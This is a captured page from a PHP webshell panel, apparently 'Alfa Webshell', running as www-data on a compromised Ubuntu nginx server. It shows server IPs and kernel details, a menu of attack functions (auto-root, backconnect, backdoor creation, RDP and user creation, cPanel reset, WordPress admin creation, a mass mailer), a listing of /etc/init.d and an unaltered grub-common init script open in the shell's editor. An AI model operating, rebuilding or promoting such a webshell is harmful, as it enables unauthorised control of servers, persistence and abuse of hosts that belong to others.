Linux ubuntu 6.8.0-90-generic #91-Ubuntu SMP PREEMPT_DYNAMIC Tue Nov 18 14:14:30 UTC 2025 x86_64
nginx/1.24.0
: 67.217.245.49 | : 216.73.216.153
Cant Read [ /etc/named.conf ]
8.3.6
www-data
Bypass.pw
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
init.d /
[ HOME SHELL ]
Name
Size
Permission
Action
apache-htcacheclean
2.43
KB
-rwxr-xr-x
apache2
7.95
KB
-rwxr-xr-x
apparmor
3.65
KB
-rwxr-xr-x
apport
2.22
KB
-rwxr-xr-x
auditd
3.54
KB
-rwxr-xr-x
clamav-freshclam
7.51
KB
-rwxr-xr-x
console-setup.sh
1.21
KB
-rwxr-xr-x
cron
3.03
KB
-rwxr-xr-x
cryptdisks
937
B
-rwxr-xr-x
cryptdisks-early
896
B
-rwxr-xr-x
dbus
3.08
KB
-rwxr-xr-x
grub-common
985
B
-rwxr-xr-x
iperf3
1.36
KB
-rwxr-xr-x
iscsid
1.48
KB
-rwxr-xr-x
keyboard-setup.sh
1.45
KB
-rwxr-xr-x
kmod
2
KB
-rwxr-xr-x
mariadb
8.26
KB
-rwxr-xr-x
nginx
4.47
KB
-rwxr-xr-x
open-iscsi
2.41
KB
-rwxr-xr-x
open-vm-tools
1.8
KB
-rwxr-xr-x
pcp
2.92
KB
-rwxr-xr-x
php8.3-fpm
4.19
KB
-rwxr-xr-x
plymouth
1.35
KB
-rwxr-xr-x
plymouth-log
760
B
-rwxr-xr-x
pmcd
16.98
KB
-rwxr-xr-x
pmie
2.49
KB
-rwxr-xr-x
pmlogger
2.56
KB
-rwxr-xr-x
pmproxy
2.5
KB
-rwxr-xr-x
procps
959
B
-rwxr-xr-x
rsync
4.31
KB
-rwxr-xr-x
screen-cleanup
1.19
KB
-rwxr-xr-x
ssh
3.96
KB
-rwxr-xr-x
sysstat
1.54
KB
-rwxr-xr-x
ufw
2.04
KB
-rwxr-xr-x
unattended-upgrades
1.36
KB
-rwxr-xr-x
uuidd
1.28
KB
-rwxr-xr-x
vnstat
1.55
KB
-rwxr-xr-x
vsftpd
2.02
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : grub-common
#! /bin/sh ### BEGIN INIT INFO # Provides: grub-common # Required-Start: $all # Required-Stop: # Default-Start: 2 3 4 5 # Default-Stop: # Short-Description: Record successful boot for GRUB # Description: GRUB displays the boot menu at the next boot if it # believes that the previous boot failed. This script # informs it that the system booted successfully. ### END INIT INFO command -v grub-editenv >/dev/null || exit 0 # Define LSB log_* functions. # Depend on lsb-base (>= 3.0-6) to ensure that this file is present. . /lib/lsb/init-functions case $1 in start|restart|force-reload) log_action_msg "Recording successful boot for GRUB" [ -s /boot/grub/grubenv ] || rm -f /boot/grub/grubenv mkdir -p /boot/grub grub-editenv /boot/grub/grubenv unset recordfail log_end_msg $? ;; stop) ;; status) exit 0 ;; *) echo "Usage: $0 {start|stop|status|restart|force-reload}" >&2 exit 3 ;; esac exit 0
Close